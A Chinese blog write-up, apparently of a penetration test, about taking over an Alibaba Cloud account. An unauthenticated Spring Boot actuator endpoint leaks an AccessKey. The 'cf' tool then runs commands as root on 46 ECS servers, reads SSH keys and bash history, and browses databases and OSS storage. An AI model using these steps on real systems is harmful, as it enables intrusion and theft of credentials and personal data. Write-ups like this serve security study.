【漏洞案例】一次简单的“云“上野战记录

一次简单的”云”上野战记录

0x00 Springboot actuator开局

打点发现某系统存在springboot actuator未授权访问,看到一个神奇的oss接口,springboot未授权玩了这么多年,也是第一次碰到云的响应:

【漏洞案例】一次简单的“云“上野战记录_第1张图片

直接访问,AK到手:

【漏洞案例】一次简单的“云“上野战记录_第2张图片 

0x01 一键接管?

配置AK:

cf config

【漏洞案例】一次简单的“云“上野战记录_第3张图片

查看当前AK的权限:

cf alibaba perm

【漏洞案例】一次简单的“云“上野战记录_第4张图片 

一键接管控制台:

cf alibaba console

 

 【漏洞案例】一次简单的“云“上野战记录_第5张图片

云上自带的扫描,可以看到有好多漏洞都未修复,相当于一堆靶场啊:

【漏洞案例】一次简单的“云“上野战记录_第6张图片

0x02 ECS利用

列出ECS:

 cf alibaba ecs ls

【漏洞案例】一次简单的“云“上野战记录_第7张图片

46台服务器到手(有几个stoped),直接命令三连,截图留证:

cf alibaba ecs exec -b

【漏洞案例】一次简单的“云“上野战记录_第8张图片 

然后就是翻翻实例,看看能不能发现什么有用的信息。

root权限,直接开始捡漏,看到了公私钥,又一波免密登录机器到手:

cf alibaba ecs exec -i 实例ID -c "ls ~/.ssh"

【漏洞案例】一次简单的“云“上野战记录_第9张图片

cf alibaba ecs exec -i 实例ID -c "ls ~/.bash_history"

【漏洞案例】一次简单的“云“上野战记录_第10张图片

熟悉的味道,碰到了久违的k8s,拿下拿下:

cf alibaba ecs exec -i 实例ID -c "docker ps -a"

【漏洞案例】一次简单的“云“上野战记录_第11张图片 

再看看数据库吧: 

 【漏洞案例】一次简单的“云“上野战记录_第12张图片

【漏洞案例】一次简单的“云“上野战记录_第13张图片 

 

0x03 OSS利用

内容比较多,直接oss浏览器连接查看,太多了,懒得翻了,一般会存一些照片(证件照?),备份库之类的:

【漏洞案例】一次简单的“云“上野战记录_第14张图片

 

 

你可能感兴趣的:(云安全,java,spring,boot,spring,安全,云原生)